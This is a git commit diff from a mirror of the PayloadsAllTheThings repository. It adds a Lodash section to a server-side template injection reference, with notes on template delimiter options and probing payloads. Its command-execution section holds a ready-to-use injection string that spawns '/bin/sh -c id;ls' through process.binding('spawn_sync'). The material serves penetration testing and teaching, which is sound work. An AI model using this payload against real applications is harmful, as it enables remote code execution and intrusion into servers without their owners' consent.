mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-14 00:47:20 +00:00
commit
c030379871
1 changed files with 48 additions and 0 deletions
|
@ -56,6 +56,9 @@
|
|||
- [Lessjs - SSRF / LFI](#lessjs---ssrf--lfi)
|
||||
- [Lessjs < v3 - Command Execution](#lessjs--v3---command-execution)
|
||||
- [Plugins](#plugins)
|
||||
- [JavaScript - Lodash](#Lodash)
|
||||
- [Lodash - Basic Injection](#Lodash---Basic-Injection)
|
||||
- [Lodash - Command Execution](#Lodash---Command-Execution)
|
||||
- [Python - Mako](#mako)
|
||||
- [Direct access to os from TemplateNamespace:](#direct-access-to-os-from-templatenamespace)
|
||||
- [Java - Pebble](#pebble)
|
||||
|
@ -743,6 +746,51 @@ registerPlugin({
|
|||
|
||||
---
|
||||
|
||||
## Lodash
|
||||
|
||||
[Official website](https://lodash.com/docs/4.17.15)
|
||||
|
||||
### Lodash - Basic Injection
|
||||
|
||||
How to create a template:
|
||||
|
||||
```javascript
|
||||
const _ = require('lodash');
|
||||
string = "{{= username}}"
|
||||
const options = {
|
||||
evaluate: /\{\{(.+?)\}\}/g,
|
||||
interpolate: /\{\{=(.+?)\}\}/g,
|
||||
escape: /\{\{-(.+?)\}\}/g,
|
||||
};
|
||||
|
||||
_.template(string, options);
|
||||
```
|
||||
|
||||
- **string:** The template string.
|
||||
- **options.interpolate:** It is a regular expression that specifies the HTML *interpolate* delimiter.
|
||||
- **options.evaluate:** It is a regular expression that specifies the HTML *evaluate* delimiter.
|
||||
- **options.escape:** It is a regular expression that specifies the HTML *escape* delimiter.
|
||||
|
||||
For the purpose of RCE, the delimiter of templates is determined by the **options.evaluate** parameter.
|
||||
|
||||
```javascript
|
||||
{{= _.VERSION}}
|
||||
${= _.VERSION}
|
||||
<%= _.VERSION %>
|
||||
|
||||
|
||||
{{= _.templateSettings.evaluate }}
|
||||
${= _.VERSION}
|
||||
<%= _.VERSION %>
|
||||
|
||||
```
|
||||
|
||||
### Lodash - Command Execution
|
||||
|
||||
```
|
||||
{{x=Object}}{{w=a=new x}}{{w.type="pipe"}}{{w.readable=1}}{{w.writable=1}}{{a.file="/bin/sh"}}{{a.args=["/bin/sh","-c","id;ls"]}}{{a.stdio=[w,w]}}{{process.binding("spawn_sync").spawn(a).output}}
|
||||
```
|
||||
|
||||
## Mako
|
||||
|
||||
[Official website](https://www.makotemplates.org/)
|
||||
|
|